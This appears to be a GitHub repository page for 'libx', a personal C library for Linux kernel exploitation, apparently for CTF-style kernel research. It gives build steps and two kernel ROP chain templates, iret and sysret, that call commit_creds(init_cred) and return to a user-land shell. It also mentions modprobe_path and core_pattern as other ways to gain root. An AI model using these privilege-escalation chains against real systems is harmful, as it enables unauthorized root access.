Skip to content

n132/libx

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

libx

It's a personal c language library for kernel exploits.

Dependencies

# If you use fuse
sudo apt install fuse libfuse-dev libkeyutils-dev

Usage

Install libx

git clone [email protected]:n132/libx.git
cd libx
make
make install # you may need sudo

uninstall libx

make clean
make uninstall

Example

//gcc main.c -o ./main -lx -w
#include <libx.h>
int main(){
    libxInit();
}

KROP

In kernel ROP, we usually return to user land by iret or sysret. Other methods also work for execution binary with root privileges such as modprob_path or core_pattern.

iret

    p[idx++]  = rdi;
    p[idx++]  = init_cred                   - NO_ASLR_BASE + base;
    p[idx++]  = commit_creds                - NO_ASLR_BASE + base;
    p[idx++]  = swapgs_restore_regs_and_return_to_usermode + 103 - NO_ASLR_BASE + base;
    p[idx++]  = *(size_t*) "RDI";
    p[idx++]  = *(size_t*) "RAX";
    p[idx++]  = shell;
    p[idx++]  = user_cs;
    p[idx++]  = user_rflags;
    p[idx++]  = user_sp|8;
    p[idx++]  = user_ss;

sysret

    p[idx++]  = rdi;
    p[idx++]  = init_cred                   - NO_ASLR_BASE + base;
    p[idx++]  = commit_creds                - NO_ASLR_BASE + base;
    p[idx++]  = r11;
    p[idx++]  = user_rflags;
    p[idx++]  = rcx;
    p[idx++]  = shell;
    p[idx++]  = sysret; // pop rsp; swapgs; sysret
    p[idx++]  = user_sp|8;